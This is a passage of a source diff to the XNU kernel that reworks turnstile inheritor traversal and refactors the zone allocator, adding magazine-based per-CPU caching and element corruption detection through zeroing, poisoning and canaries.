+thread_group_get_flags(struct thread_group *tg) { return tg->tg_flags; } diff --git a/osfmk/kern/thread_group.h b/osfmk/kern/thread_group.h index f18259bd7..c7e78d05e 100644 --- a/osfmk/kern/thread_group.h +++ b/osfmk/kern/thread_group.h @@ -91,7 +91,7 @@ cluster_type_t thread_group_recommendation(struct thread_group *tg); typedef void (*thread_group_iterate_fn_t)(void*, int, struct thread_group *); kern_return_t thread_group_iterate_stackshot(thread_group_iterate_fn_t callout, void *arg); -uint64_t kdp_thread_group_get_flags(struct thread_group *); +uint32_t thread_group_get_flags(struct thread_group *); boolean_t thread_group_smp_restricted(struct thread_group *tg); void thread_group_update_recommendation(struct thread_group *tg, cluster_type_t new_recommendation); diff --git a/osfmk/kern/turnstile.c b/osfmk/kern/turnstile.c index baa08bf27..8d98e3989 100644 --- a/osfmk/kern/turnstile.c +++ b/osfmk/kern/turnstile.c @@ -3188,59 +3188,72 @@ turnstile_stats_update( static uint64_t kdp_turnstile_traverse_inheritor_chain(struct turnstile *ts, uint64_t *flags, uint8_t *hops) { + uint8_t unknown_hops; + if (waitq_held(&ts->ts_waitq)) { *flags |= STACKSHOT_TURNSTILE_STATUS_LOCKED_WAITQ; return 0; } *hops = *hops + 1; + unknown_hops = *hops; + + /* + * If a turnstile is inheriting our priority, recurse. If we get back *exactly* UNKNOWN, + * continue on, since we may be able to give a more specific answer. To + * give an accurate hops count, we reset *hops, saving the recursive value in + * unknown_hops to use if we can't give a better answer. + */ + if (ts->ts_inheritor_flags & TURNSTILE_INHERITOR_TURNSTILE) { + uint8_t pre_hops = *hops; + uint64_t ret = kdp_turnstile_traverse_inheritor_chain(ts->ts_inheritor, flags, hops); + /* + * Note that while flags is usually |=ed, we're checking with != here to + * make sure we only replace *exactly* UNKNOWN + */ + if (ret != 0 || *flags != STACKSHOT_TURNSTILE_STATUS_UNKNOWN) { + return ret; + } + /* restore original hops value, saving the new one if we fall through to unknown */ + unknown_hops = *hops; + *hops = pre_hops; + *flags = 0; + } + + if (ts->ts_inheritor_flags & TURNSTILE_INHERITOR_THREAD) { + *flags |= STACKSHOT_TURNSTILE_STATUS_THREAD; + return (uint64_t) thread_tid(ts->ts_inheritor); + } + + if (ts->ts_inheritor_flags & TURNSTILE_INHERITOR_WORKQ) { + *flags |= STACKSHOT_TURNSTILE_STATUS_WORKQUEUE; + return VM_KERNEL_UNSLIDE_OR_PERM(ts->ts_inheritor); + } /* * If we found a send turnstile, try to get the task that the turnstile's * port is in the ipc space of */ if (turnstile_is_send_turnstile(ts)) { - task_t dest_task = TASK_NULL; ipc_port_t port = (ipc_port_t)ts->ts_proprietor; if (port && ip_active(port)) { if (ip_lock_held_kdp(port)) { *flags |= STACKSHOT_TURNSTILE_STATUS_HELD_IPLOCK; - return 0; - } else { - if (port->ip_receiver_name != 0) { - if (port->ip_receiver) { - ipc_space_t space = (ipc_space_t) port->ip_receiver; - - dest_task = space->is_task; - } else { - return 0; - } - } } - } + if (port->ip_receiver_name != 0 && port->ip_receiver) { + ipc_space_t space = (ipc_space_t) port->ip_receiver; + task_t dest_task = space->is_task; - if (dest_task != TASK_NULL) { - *flags |= STACKSHOT_TURNSTILE_STATUS_BLOCKED_ON_TASK; - return pid_from_task(dest_task); + if (dest_task != TASK_NULL) { + *flags |= STACKSHOT_TURNSTILE_STATUS_BLOCKED_ON_TASK; + return pid_from_task(dest_task); + } + } } } - if (ts->ts_inheritor_flags & TURNSTILE_INHERITOR_TURNSTILE) { - return kdp_turnstile_traverse_inheritor_chain(ts->ts_inheritor, flags, hops); - } - - if (ts->ts_inheritor_flags & TURNSTILE_INHERITOR_THREAD) { - *flags |= STACKSHOT_TURNSTILE_STATUS_THREAD; - return (uint64_t) thread_tid(ts->ts_inheritor); - } - - if (ts->ts_inheritor_flags & TURNSTILE_INHERITOR_WORKQ) { - *flags |= STACKSHOT_TURNSTILE_STATUS_WORKQUEUE; - return VM_KERNEL_UNSLIDE_OR_PERM(ts->ts_inheritor); - } - if (turnstile_is_receive_turnstile(ts)) { ipc_port_t port = (ipc_port_t)ts->ts_proprietor; if (port && ip_active(port)) { @@ -3260,6 +3273,7 @@ kdp_turnstile_traverse_inheritor_chain(struct turnstile *ts, uint64_t *flags, ui } } + *hops = unknown_hops; *flags |= STACKSHOT_TURNSTILE_STATUS_UNKNOWN; return 0; } diff --git a/osfmk/kern/ux_handler.c b/osfmk/kern/ux_handler.c index 0329eeea6..07e60a0c1 100644 --- a/osfmk/kern/ux_handler.c +++ b/osfmk/kern/ux_handler.c @@ -58,8 +58,8 @@ * most Mach exceptions. */ -static const void *ux_handler_kobject = NULL; -SECURITY_READ_ONLY_LATE(ipc_port_t) ux_handler_port = IP_NULL; +static SECURITY_READ_ONLY_LATE(const void *) ux_handler_kobject = NULL; +SECURITY_READ_ONLY_LATE(ipc_port_t) ux_handler_port = IP_NULL; /* * init is called early in Mach initialization diff --git a/osfmk/kern/zalloc.c b/osfmk/kern/zalloc.c index 1ef23d043..9d3349911 100644 --- a/osfmk/kern/zalloc.c +++ b/osfmk/kern/zalloc.c @@ -64,6 +64,7 @@ */ #define ZALLOC_ALLOW_DEPRECATED 1 +#if !ZALLOC_TEST #include #include #include @@ -94,6 +95,7 @@ #include #include #include +#include #include /* C_SLOT_PACKED_PTR* */ #include @@ -111,13 +113,32 @@ #include #if KASAN_ZALLOC +/* + * Set to 0 to debug poisoning and ZC_ZFREE_CLEARMEM validation under kasan. + * Otherwise they are double-duty with what kasan already does. + */ +#define ZALLOC_ENABLE_POISONING 0 #define ZONE_ENABLE_LOGGING 0 #elif DEBUG || DEVELOPMENT +#define ZALLOC_ENABLE_POISONING 1 #define ZONE_ENABLE_LOGGING 1 #else +#define ZALLOC_ENABLE_POISONING 1 #define ZONE_ENABLE_LOGGING 0 #endif +#if __LP64__ +#define ZALLOC_EARLY_GAPS 1 +#else +#define ZALLOC_EARLY_GAPS 0 +#endif + +#if DEBUG +#define z_debug_assert(expr) assert(expr) +#else +#define z_debug_assert(expr) (void)(expr) +#endif + extern void vm_pageout_garbage_collect(int collect); /* Returns pid of the task with the largest number of VM map entries. */ @@ -131,120 +152,277 @@ extern boolean_t memorystatus_kill_on_zone_map_exhaustion(pid_t pid); extern zone_t vm_map_entry_zone; extern zone_t vm_object_zone; -extern vm_offset_t kmapoff_kaddr; -extern unsigned int kmapoff_pgcnt; -extern unsigned int stack_total; -extern unsigned long long stack_allocs; - -/* - * The max # of elements in a chunk should fit into - * zone_page_metadata.free_count (uint16_t). - * - * Update this if the type of free_count changes. - */ -#define ZONE_CHUNK_MAXELEMENTS (UINT16_MAX) - -#define ZONE_PAGECOUNT_BITS 14 -/* Zone elements must fit both a next pointer and a backup pointer */ -#define ZONE_MIN_ELEM_SIZE (2 * sizeof(vm_offset_t)) +#define ZONE_MIN_ELEM_SIZE sizeof(uint64_t) #define ZONE_MAX_ALLOC_SIZE (32 * 1024) -/* per-cpu zones are special because of counters */ -#define ZONE_MIN_PCPU_ELEM_SIZE (1 * sizeof(vm_offset_t)) - -struct zone_map_range { - vm_offset_t min_address; - vm_offset_t max_address; -}; - struct zone_page_metadata { /* The index of the zone this metadata page belongs to */ - zone_id_t zm_index; - - /* - * zm_secondary_page == 0: number of pages in this run - * zm_secondary_page == 1: offset to the chunk start - */ - uint16_t zm_page_count : ZONE_PAGECOUNT_BITS; + zone_id_t zm_index : 11; - /* Whether this page is part of a chunk run */ - uint16_t zm_percpu : 1; - uint16_t zm_secondary_page : 1; + /* Whether `zm_bitmap` is an inline bitmap or a packed bitmap reference */ + uint16_t zm_inline_bitmap : 1; /* - * The start of the freelist can be maintained as a 16-bit - * offset instead of a pointer because the free elements would - * be at max ZONE_MAX_ALLOC_SIZE bytes away from the start - * of the allocation chunk. + * Zones allocate in "chunks" of zone_t::z_chunk_pages consecutive + * pages, or zpercpu_count() pages if the zone is percpu. * - * Offset from start of the allocation chunk to free element - * list head. - */ - uint16_t zm_freelist_offs; - - /* - * zm_secondary_page == 0: number of allocated elements in the chunk - * zm_secondary_page == 1: unused + * The first page of it has its metadata set with: + * - 0 if none of the pages are currently wired + * - the number of wired pages in the chunk (not scaled for percpu). * - * PAGE_METADATA_EMPTY_FREELIST indicates an empty freelist + * Other pages in the chunk have their zm_chunk_len set to + * ZM_SECONDARY_PAGE or ZM_SECONDARY_PCPU_PAGE depending on whether + * the zone is percpu or not. For those, zm_page_index holds the + * index of that page in the run. */ - uint16_t zm_alloc_count; -#define PAGE_METADATA_EMPTY_FREELIST UINT16_MAX + uint16_t zm_chunk_len : 4; +#define ZM_CHUNK_LEN_MAX 0x8 +#define ZM_SECONDARY_PAGE 0xe +#define ZM_SECONDARY_PCPU_PAGE 0xf + + union { +#define ZM_ALLOC_SIZE_LOCK 1u + uint16_t zm_alloc_size; /* first page only */ + uint16_t zm_page_index; /* secondary pages only */ + }; + union { + uint32_t zm_bitmap; /* most zones */ + uint32_t zm_bump; /* permanent zones */ + }; zone_pva_t zm_page_next; zone_pva_t zm_page_prev; - - /* - * This is only for the sake of debuggers - */ -#define ZONE_FOREIGN_COOKIE 0x123456789abcdef - uint64_t zm_foreign_cookie[]; }; +static_assert(sizeof(struct zone_page_metadata) == 16, "validate packing"); +__enum_closed_decl(zone_addr_kind_t, bool, { + ZONE_ADDR_FOREIGN, + ZONE_ADDR_NATIVE, +}); +#define ZONE_ADDR_KIND_COUNT 2 -/* Align elements that use the zone page list to 32 byte boundaries. */ -#define ZONE_PAGE_FIRST_OFFSET(kind) ((kind) == ZONE_ADDR_NATIVE ? 0 : 32) +/*! + * @typedef zone_element_t + * + * @brief + * Type that represents a "resolved" zone element. + * + * @description + * This type encodes an element pointer as a tuple of: + * { chunk base, element index, element protection }. + * + * The chunk base is extracted with @c trunc_page() + * as it is always page aligned, and occupies the bits above @c PAGE_SHIFT. + * + * The low two bits encode the protection mode (see @c zprot_mode_t). + * + * The other bits encode the element index in the chunk rather than its address. + */ +typedef struct zone_element { + vm_offset_t ze_value; +} zone_element_t; -static_assert(sizeof(struct zone_page_metadata) == 16, "validate packing"); +/*! + * @typedef zone_magazine_t + * + * @brief + * Magazine of cached allocations. + * + * @field zm_cur how many elements this magazine holds (unused while loaded). + * @field zm_link linkage used by magazine depots. + * @field zm_elems an array of @c zc_mag_size() elements. + */ +typedef struct zone_magazine { + uint16_t zm_cur; + STAILQ_ENTRY(zone_magazine) zm_link; + zone_element_t zm_elems[0]; +} *zone_magazine_t; + +/*! + * @typedef zone_cache_t + * + * @brief + * Magazine of cached allocations. + * + * @discussion + * Below is a diagram of the caching system. This design is inspired by the + * paper "Magazines and Vmem: Extending the Slab Allocator to Many CPUs and + * Arbitrary Resources" by Jeff Bonwick and Jonathan Adams and the FreeBSD UMA + * zone allocator (itself derived from this seminal work). + * + * It is divided into 3 layers: + * - the per-cpu layer, + * - the recirculation depot layer, + * - the Zone Allocator. + * + * The per-cpu and recirculation depot layer use magazines (@c zone_magazine_t), + * which are stacks of up to @c zc_mag_size() elements. + * + *

CPU layer

+ * + * The CPU layer (@c zone_cache_t) looks like this: + * + * ╭─ a ─ f ─┬───────── zm_depot ──────────╮ + * │ ╭─╮ ╭─╮ │ ╭─╮ ╭─╮ ╭─╮ ╭─╮ ╭─╮ │ + * │ │#│ │#│ │ │#│ │#│ │#│ │#│ │#│ │ + * │ │#│ │ │ │ │#│ │#│ │#│ │#│ │#│ │ + * │ │ │ │ │ │ │#│ │#│ │#│ │#│ │#│ │ + * │ ╰─╯ ╰─╯ │ ╰─╯ ╰─╯ ╰─╯ ╰─╯ ╰─╯ │ + * ╰─────────┴─────────────────────────────╯ + * + * It has two pre-loaded magazines (a)lloc and (f)ree which we allocate from, + * or free to. Serialization is achieved through disabling preemption, and only + * the current CPU can acces those allocations. This is represented on the left + * hand side of the diagram above. + * + * The right hand side is the per-cpu depot. It consists of @c zm_depot_count + * full magazines, and is protected by the @c zm_depot_lock for access. + * The lock is expected to absolutely never be contended, as only the local CPU + * tends to access the local per-cpu depot in regular operation mode. + * + * However unlike UMA, our implementation allows for the zone GC to reclaim + * per-CPU magazines aggresively, which is serialized with the @c zm_depot_lock. + * + * + *

Recirculation Depot

+ * + * The recirculation depot layer is a list similar to the per-cpu depot, + * however it is different in two fundamental ways: + * + * - it is protected by the regular zone lock, + * - elements referenced by the magazines in that layer appear free + * to the zone layer. + * + * + *

Magazine circulation and sizing

+ * + * The caching system sizes itself dynamically. Operations that allocate/free + * a single element call @c zone_lock_nopreempt_check_contention() which records + * contention on the lock by doing a trylock and recording its success. + * + * This information is stored in the @c z_contention_cur field of the zone, + * and a windoed moving average is maintained in @c z_contention_wma. + * Each time a CPU registers any contention, it will also allow its own per-cpu + * cache to grow, incrementing @c zc_depot_max, which is how the per-cpu layer + * might grow into using its local depot. + * + * Note that @c zc_depot_max assume that the (a) and (f) pre-loaded magazines + * on average contain @c zc_mag_size() elements. + * + * When a per-cpu layer cannot hold more full magazines in its depot, + * then it will overflow about 1/3 of its depot into the recirculation depot + * (see @c zfree_cached_slow(). Conversely, when a depot is empty, then it will + * refill its per-cpu depot to about 1/3 of its size from the recirculation + * depot (see @c zalloc_cached_slow()). + * + * Lastly, the zone layer keeps track of the high and low watermark of how many + * elements have been free per period of time (including being part of the + * recirculation depot) in the @c z_elems_free_min and @c z_elems_free_max + * fields. A weighted moving average of the amplitude of this is maintained in + * the @c z_elems_free_wss which informs the zone GC on how to gently trim + * zones without hurting performance. + * + * + *

Security considerations

+ * + * The zone caching layer has been designed to avoid returning elements in + * a strict LIFO behavior: @c zalloc() will allocate from the (a) magazine, + * and @c zfree() free to the (f) magazine, and only swap them when the + * requested operation cannot be fulfilled. + * + * The per-cpu overflow depot or the recirculation depots are similarly used + * in FIFO order. + * + * More importantly, when magazines flow through the recirculation depot, + * the elements they contain are marked as "free" in the zone layer bitmaps. + * Because allocations out of per-cpu caches verify the bitmaps at allocation + * time, this acts as a poor man's double-free quarantine. The magazines + * allow to avoid the cost of the bit-scanning involved in the zone-level + * @c zalloc_item() codepath. + * + * + * @field zc_alloc_cur denormalized number of elements in the (a) magazine + * @field zc_free_cur denormalized number of elements in the (f) magazine + * @field zc_alloc_elems a pointer to the array of elements in (a) + * @field zc_free_elems a pointer to the array of elements in (f) + * + * @field zc_depot_lock a lock to access @c zc_depot, @c zc_depot_cur. + * @field zc_depot a list of @c zc_depot_cur full magazines + * @field zc_depot_cur number of magazines in @c zc_depot + * @field zc_depot_max the maximum number of elements in @c zc_depot, + * protected by the zone lock. + */ +typedef struct zone_cache { + uint16_t zc_alloc_cur; + uint16_t zc_free_cur; + uint16_t zc_depot_cur; + uint16_t __zc_padding; + zone_element_t *zc_alloc_elems; + zone_element_t *zc_free_elems; + hw_lock_bit_t zc_depot_lock; + uint32_t zc_depot_max; + struct zone_depot zc_depot; +} *zone_cache_t; static __security_const_late struct { - struct zone_map_range zi_map_range; - struct zone_map_range zi_general_range; - struct zone_map_range zi_meta_range; - struct zone_map_range zi_foreign_range; + struct zone_map_range zi_map_range[ZONE_ADDR_KIND_COUNT]; + struct zone_map_range zi_meta_range; /* debugging only */ + struct zone_map_range zi_bits_range; /* bits buddy allocator */ /* * The metadata lives within the zi_meta_range address range. * * The correct formula to find a metadata index is: - * absolute_page_index - page_index(zi_meta_range.min_address) + * absolute_page_index - page_index(MIN(zi_map_range[*].min_address)) * * And then this index is used to dereference zi_meta_range.min_address * as a `struct zone_page_metadata` array. * * To avoid doing that substraction all the time in the various fast-paths, - * zi_array_base is offset by `page_index(zi_meta_range.min_address)` - * to avoid redoing that math all the time. + * zi_meta_base are pre-offset with that minimum page index to avoid redoing + * that math all the time. + * + * Do note that the array might have a hole punched in the middle, + * see zone_metadata_init(). */ - struct zone_page_metadata *zi_array_base; + struct zone_page_metadata *zi_meta_base; } zone_info; +/* + * Initial array of metadata for stolen memory. + * + * The numbers here have to be kept in sync with vm_map_steal_memory() + * so that we have reserved enough metadata. + * + * After zone_init() has run (which happens while the kernel is still single + * threaded), the metadata is moved to its final dynamic location, and + * this array is unmapped with the rest of __startup_data at lockdown. + */ +#if CONFIG_GZALLOC +#define ZONE_FOREIGN_META_INLINE_COUNT 20032 +#else +#define ZONE_FOREIGN_META_INLINE_COUNT 64 +#endif +__startup_data +static struct zone_page_metadata + zone_foreign_meta_array_startup[ZONE_FOREIGN_META_INLINE_COUNT]; + /* * The zone_locks_grp allows for collecting lock statistics. * All locks are associated to this group in zinit. * Look at tools/lockstat for debugging lock contention. */ -LCK_GRP_DECLARE(zone_locks_grp, "zone_locks"); -LCK_MTX_EARLY_DECLARE(zone_metadata_region_lck, &zone_locks_grp); +static LCK_GRP_DECLARE(zone_locks_grp, "zone_locks"); +static LCK_MTX_EARLY_DECLARE(zone_metadata_region_lck, &zone_locks_grp); /* * Exclude more than one concurrent garbage collection */ -LCK_GRP_DECLARE(zone_gc_lck_grp, "zone_gc"); -LCK_MTX_EARLY_DECLARE(zone_gc_lock, &zone_gc_lck_grp); +static LCK_GRP_DECLARE(zone_gc_lck_grp, "zone_gc"); +static LCK_MTX_EARLY_DECLARE(zone_gc_lock, &zone_gc_lck_grp); -boolean_t panic_include_zprint = FALSE; +bool panic_include_zprint = FALSE; mach_memory_info_t *panic_kext_memory_info = NULL; vm_size_t panic_kext_memory_size = 0; @@ -253,8 +431,8 @@ vm_size_t panic_kext_memory_size = 0; * zone_destroyed_bitmap */ static SIMPLE_LOCK_DECLARE(all_zones_lock, 0); -static unsigned int num_zones_in_use; -unsigned int _Atomic num_zones; +static zone_id_t num_zones_in_use; +zone_id_t _Atomic num_zones; SECURITY_READ_ONLY_LATE(unsigned int) zone_view_count; #if KASAN_ZALLOC @@ -262,7 +440,28 @@ SECURITY_READ_ONLY_LATE(unsigned int) zone_view_count; #else /* !KASAN_ZALLOC */ #define MAX_ZONES 402 #endif/* !KASAN_ZALLOC */ -struct zone zone_array[MAX_ZONES]; + +/* + * Initial globals for zone stats until we can allocate the real ones. + * Those get migrated inside the per-CPU ones during zone_init() and + * this array is unmapped with the rest of __startup_data at lockdown. + */ + +/* zone to allocate zone_magazine structs from */ +static SECURITY_READ_ONLY_LATE(zone_t) zc_magazine_zone; +/* + * Until pid1 is made, zone caching is off, + * until compute_zone_working_set_size() runs for the firt time. + * + * -1 represents the "never enabled yet" value. + */ +static int8_t zone_caching_disabled = -1; + +__startup_data +static struct zone_cache zone_cache_startup[MAX_ZONES]; +__startup_data +static struct zone_stats zone_stats_startup[MAX_ZONES]; +struct zone zone_array[MAX_ZONES]; /* Initialized in zone_bootstrap(), how many "copies" the per-cpu system does */ static SECURITY_READ_ONLY_LATE(unsigned) zpercpu_early_count; @@ -270,9 +469,6 @@ static SECURITY_READ_ONLY_LATE(unsigned) zpercpu_early_count; /* Used to keep track of destroyed slots in the zone_array */ static bitmap_t zone_destroyed_bitmap[BITMAP_LEN(MAX_ZONES)]; -/* number of pages used by all zones */ -static long _Atomic zones_phys_page_count; - /* number of zone mapped pages used by all zones */ static long _Atomic zones_phys_page_mapped_count; @@ -298,70 +494,56 @@ TUNABLE(zone_security_options_t, zsecurity_options, "zs", ZSECURITY_DEFAULT); #if VM_MAX_TAG_ZONES /* enable tags for zones that ask for it */ -TUNABLE(bool, zone_tagging_on, "-zt", false); +static TUNABLE(bool, zone_tagging_on, "-zt", false); #endif /* VM_MAX_TAG_ZONES */ #if DEBUG || DEVELOPMENT TUNABLE(bool, zalloc_disable_copyio_check, "-no-copyio-zalloc-check", false); -__options_decl(zalloc_debug_t, uint32_t, { - ZALLOC_DEBUG_ZONEGC = 0x00000001, - ZALLOC_DEBUG_ZCRAM = 0x00000002, -}); - -TUNABLE(zalloc_debug_t, zalloc_debug, "zalloc_debug", 0); #endif /* DEBUG || DEVELOPMENT */ #if CONFIG_ZLEAKS /* Making pointer scanning leaks detection possible for all zones */ -TUNABLE(bool, zone_leaks_scan_enable, "-zl", false); +static TUNABLE(bool, zone_leaks_scan_enable, "-zl", false); #else #define zone_leaks_scan_enable false #endif -/* - * Async allocation of zones - * This mechanism allows for bootstrapping an empty zone which is setup with - * non-blocking flags. The first call to zalloc_noblock() will kick off a thread_call - * to zalloc_async. We perform a zalloc() (which may block) and then an immediate free. - * This will prime the zone for the next use. - * - * Currently the thread_callout function (zalloc_async) will loop through all zones - * looking for any zone with async_pending set and do the work for it. +/*! @enum zprot_mode_t * - * NOTE: If the calling thread for zalloc_noblock is lower priority than thread_call, - * then zalloc_noblock to an empty zone may succeed. - */ -static void zalloc_async(thread_call_param_t p0, thread_call_param_t p1); -static thread_call_data_t call_async_alloc; -static void zcram_and_lock(zone_t zone, vm_offset_t newmem, vm_size_t size); - -/* - * Zone Corruption Debugging + * @brief + * Zone element corruption detection mode. * + * @discussion * We use four techniques to detect modification of a zone element * after it's been freed. * - * (1) Check the freelist next pointer for sanity. - * (2) Store a backup of the next pointer at the end of the element, - * and compare it to the primary next pointer when the element is allocated - * to detect corruption of the freelist due to use-after-free bugs. - * The backup pointer is also XORed with a per-boot random cookie. - * (3) Poison the freed element by overwriting it with 0xdeadbeef, - * and check for that value when the element is being reused to make sure - * no part of the element has been modified while it was on the freelist. - * This will also help catch read-after-frees, as code will now dereference - * 0xdeadbeef instead of a valid but freed pointer. - * (4) If the zfree_clear_mem flag is set clear the element on free and - * assert that it is still clear when alloc-ed. - * - * (1) and (2) occur for every allocation and free to a zone. - * This is done to make it slightly more difficult for an attacker to - * manipulate the freelist to behave in a specific way. - * - * Poisoning (3) occurs periodically for every N frees (counted per-zone). + * Elements that are in zones can be in 3 possible states: + * - zeroed out (@c ZPM_ZERO) + * - poisoned (@c ZPM_POISON) with the @c ZONE_POISON pattern + * - with a left and right canary (@c ZPM_CANARY). + * + * @c ZPM_AUTO is used when the actual protection for the element is unknown, + * and will be detected looking at the last word of the allocation at validation + * time. + * + * The mode of an element in zones is discovered by looking at its last + * pointer-sized value: + * - 0 means that it is zeroed out + * - @c ZONE_POISON means it is poisoned + * - any other value means it is using canaries. + * + * Elements are zeroed if: + * - the element size is smaller than @c zp_min_size, + * - the owning zone has the @c z_free_zeroes flag set, + * - the chunk backing store is fresh (and was just allocated). + * + * Elements are poisoned periodically for every N frees (counted per-zone), + * if the elements aren't otherwise zeroed out. * If -zp is passed as a boot arg, poisoning occurs for every free. * - * Zeroing (4) is done for those zones that pass the ZC_ZFREE_CLEARMEM - * flag on creation or if the element size is less than one cacheline. + * Else elements use canaries. When canaries are used, the first and last + * pointer sized values in the allocation are set to values derived from the + * element address and the @c zp_canary nonce. The first @c zp_min_size + * bytes of the elment are also cleared. * * Performance slowdown is inversely proportional to the frequency of poisoning, * with a 4-5% hit around N=1, down to ~0.3% at N=16 and just "noise" at N=32 @@ -372,23 +554,15 @@ static void zcram_and_lock(zone_t zone, vm_offset_t newmem, vm_size_t size); * * For a more heavyweight, but finer-grained method of detecting misuse * of zone memory, look up the "Guard mode" zone allocator in gzalloc.c. - * - * Zone Corruption Logging - * - * You can also track where corruptions come from by using the boot-arguments - * "zlog= -zc". Search for "Zone corruption logging" later - * in this document for more implementation and usage information. - * - * Zone Leak Detection - * - * To debug leaks of zone memory, use the zone leak detection tool 'zleaks' - * found later in this file via the showtopztrace and showz* macros in kgmacros, - * or use zlog without the -zc argument. - * */ +__enum_closed_decl(zprot_mode_t, vm_offset_t, { + ZPM_AUTO, /* element is indeterminate */ + ZPM_ZERO, /* element is zeroed */ + ZPM_POISON, /* element is poisoned */ + ZPM_CANARY, /* element extremities have a canary */ +}); +#define ZPM_MASK ((zprot_mode_t)0x3) -#define ZP_DEFAULT_SAMPLING_FACTOR 16 -#define ZP_DEFAULT_SCALE_FACTOR 4 /* * set by zp-factor=N boot arg @@ -399,57 +573,63 @@ static void zcram_and_lock(zone_t zone, vm_offset_t newmem, vm_size_t size); * A zp_factor of 1 indicates zone poisoning is on for all elements and can be * set by passing the -zp boot-arg. */ -static TUNABLE(uint32_t, zp_factor, "zp-factor", ZP_DEFAULT_SAMPLING_FACTOR); +static TUNABLE(uint32_t, zp_factor, "zp-factor", 16); /* set by zp-scale=N boot arg, scales zp_factor by zone size */ -static TUNABLE(uint32_t, zp_scale, "zp-scale", ZP_DEFAULT_SCALE_FACTOR); - -/* initialized to a per-boot random value in zp_bootstrap */ -static SECURITY_READ_ONLY_LATE(uintptr_t) zp_poisoned_cookie; -static SECURITY_READ_ONLY_LATE(uintptr_t) zp_nopoison_cookie; -static SECURITY_READ_ONLY_LATE(uintptr_t) zp_min_size; -static SECURITY_READ_ONLY_LATE(uint64_t) zone_phys_mapped_max; - -static SECURITY_READ_ONLY_LATE(vm_map_t) zone_submaps[Z_SUBMAP_IDX_COUNT]; -static SECURITY_READ_ONLY_LATE(uint32_t) zone_last_submap_idx; +static TUNABLE(uint32_t, zp_scale, "zp-scale", 4); -static struct bool_gen zone_bool_gen; -static zone_t zone_find_largest(void); -static void zone_drop_free_elements(zone_t z); - -#define submap_for_zone(z) zone_submaps[(z)->submap_idx] -#define MAX_SUBMAP_NAME 16 - -/* Globals for random boolean generator for elements in free list */ -#define MAX_ENTROPY_PER_ZCRAM 4 - -#if CONFIG_ZCACHE /* - * Specifies a single zone to enable CPU caching for. - * Can be set using boot-args: zcc_enable_for_zone_name= + * Zone caching tunables + * + * zc_mag_size(): + * size of magazines, larger to reduce contention at the expense of memory + * + * zc_auto_enable_threshold + * number of contentions per second after which zone caching engages + * automatically. + * + * 0 to disable. + * + * zc_grow_threshold + * numer of contentions per second after which the per-cpu depot layer + * grows at each newly observed contention without restriction. + * + * 0 to disable. + * + * zc_recirc_denom + * denominator of the fraction of per-cpu depot to migrate to/from + * the recirculation depot layer at a time. Default 3 (1/3). + * + * zc_defrag_ratio + * percentage of the working set to recirc size below which + * the zone is defragmented. Default is 50%. + * + * zc_free_batch_size + * The size of batches of frees/reclaim that can be done keeping + * the zone lock held (and preemption disabled). + */ +static TUNABLE(uint16_t, zc_magazine_size, "zc_mag_size()", 8); +static TUNABLE(uint32_t, zc_auto_threshold, "zc_auto_enable_threshold", 20); +static TUNABLE(uint32_t, zc_grow_threshold, "zc_grow_threshold", 8); +static TUNABLE(uint32_t, zc_recirc_denom, "zc_recirc_denom", 3); +static TUNABLE(uint32_t, zc_defrag_ratio, "zc_defrag_ratio", 50); +static TUNABLE(uint32_t, zc_free_batch_size, "zc_free_batch_size", 1024); + +static SECURITY_READ_ONLY_LATE(uintptr_t) zp_canary; +/* + * Perf results for zeroing all non data zones and 2K of data zones + * showed little regression, therefore setting zp_min_size to 2048 */ -static char cache_zone_name[MAX_ZONE_NAME]; -static TUNABLE(bool, zcc_kalloc, "zcc_kalloc", false); +static TUNABLE(uint32_t, zp_min_size, "zclear_size", 2048); +static SECURITY_READ_ONLY_LATE(uint32_t) zone_phys_mapped_max_pages; +static SECURITY_READ_ONLY_LATE(vm_map_t) zone_submaps[Z_SUBMAP_IDX_COUNT]; +static SECURITY_READ_ONLY_LATE(uint32_t) zone_last_submap_idx; -__header_always_inline bool -zone_caching_enabled(zone_t z) -{ - return z->zcache.zcc_depot != NULL; -} -#else -__header_always_inline bool -zone_caching_enabled(zone_t z __unused) -{ - return false; -} -#endif /* CONFIG_ZCACHE */ +static zone_t zone_find_largest(void); +#endif /* !ZALLOC_TEST */ #pragma mark Zone metadata - -__enum_closed_decl(zone_addr_kind_t, bool, { - ZONE_ADDR_NATIVE, - ZONE_ADDR_FOREIGN, -}); +#if !ZALLOC_TEST static inline zone_id_t zone_index(zone_t z) @@ -463,18 +643,36 @@ zone_has_index(zone_t z, zone_id_t zid) return zone_array + zid == z; } -static inline vm_size_t -zone_elem_count(zone_t zone, vm_size_t alloc_size, zone_addr_kind_t kind) +static zone_element_t +zone_element_encode(vm_offset_t base, vm_offset_t eidx, zprot_mode_t zpm) { - if (kind == ZONE_ADDR_NATIVE) { - if (zone->percpu) { - return PAGE_SIZE / zone_elem_size(zone); - } - return alloc_size / zone_elem_size(zone); - } else { - assert(alloc_size == PAGE_SIZE); - return (PAGE_SIZE - ZONE_PAGE_FIRST_OFFSET(kind)) / zone_elem_size(zone); - } + return (zone_element_t){ .ze_value = base | (eidx << 2) | zpm }; +} + +static vm_offset_t +zone_element_base(zone_element_t ze) +{ + return trunc_page(ze.ze_value); +} + +static vm_offset_t +zone_element_idx(zone_element_t ze) +{ + return (ze.ze_value & PAGE_MASK) >> 2; +} + +#if ZALLOC_ENABLE_POISONING +static zprot_mode_t +zone_element_prot(zone_element_t ze) +{ + return (zprot_mode_t)(ze.ze_value & ZPM_MASK); +} +#endif + +static vm_offset_t +zone_element_addr(zone_element_t ze, vm_offset_t esize) +{ + return zone_element_base(ze) + esize * zone_element_idx(ze); } __abortlike @@ -494,6 +692,15 @@ zone_invalid_element_addr_panic(zone_t zone, vm_offset_t addr) (void *)addr, zone_heap_name(zone), zone->z_name); } +__abortlike +static void +zone_invalid_element_panic(zone_t zone, zone_element_t ze) +{ + panic("zone element pointer validation failed (elem: %p,%d, zone %s%s)", + (void *)zone_element_base(ze), (int)zone_element_idx(ze), + zone_heap_name(zone), zone->z_name); +} + __abortlike static void zone_page_metadata_index_confusion_panic(zone_t zone, vm_offset_t addr, @@ -521,22 +728,6 @@ zone_page_metadata_list_corruption(zone_t zone, struct zone_page_metadata *meta) meta, zone_heap_name(zone), zone->z_name); } -__abortlike -static void -zone_page_metadata_foreign_queue_corruption(zone_t zone, zone_pva_t *queue) -{ - panic("native metadata index %d enqueued in foreign head %p from zone %s%s", - queue->packed_address, queue, zone_heap_name(zone), zone->z_name); -} - -__abortlike -static void -zone_page_metadata_foreign_confusion_panic(zone_t zone, vm_offset_t addr) -{ - panic("manipulating foreign address %p in a native-only zone %s%s", - (void *)addr, zone_heap_name(zone), zone->z_name); -} - 